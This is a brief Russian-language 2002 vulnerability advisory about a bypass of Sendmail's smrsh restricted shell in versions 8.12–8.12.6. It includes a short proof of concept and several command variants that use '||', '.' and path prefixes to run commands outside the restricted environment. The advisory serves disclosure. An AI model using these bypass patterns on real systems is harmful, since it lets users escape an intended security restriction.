Security Lab

Выполнение произвольных команд вне ограниченной среды в Sendmail

Дата публикации:04.10.2002
Всего просмотров:1019
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Sendmail – популярный почтовый агент для UNIX систем.

Программа smrsh (Sendmail Consortium-s Restricted SShell) разработана для предотвращения выполнения команд вне ограниченной среды. Однако, когда задаются команды, используя символы (||),(.) или (/), пользователи могут обойти проверки, выполняемые smrsh. Уязвимость позволяет пользователям выполнять команды не ограниченной среды. Пример:

$ echo "echo unauthorized execute" > /tmp/unauth 
$ smrsh -c ". || . /tmp/unauth || ." 
/bin/sh: /etc/smrsh/.: is a directory 
unauthorized execute
Или одну из следующих типов команд:
smrsh -c "/ command" 
smrsh -c "../ command" 
smrsh -c "./ command" 
smrsh -c "././ command"
уязвимость обнаружена в Sendmail Consortium Sendmail 8.12-8.12.6
Ссылки: Sendmail smrsh Bypass Vulnerabilities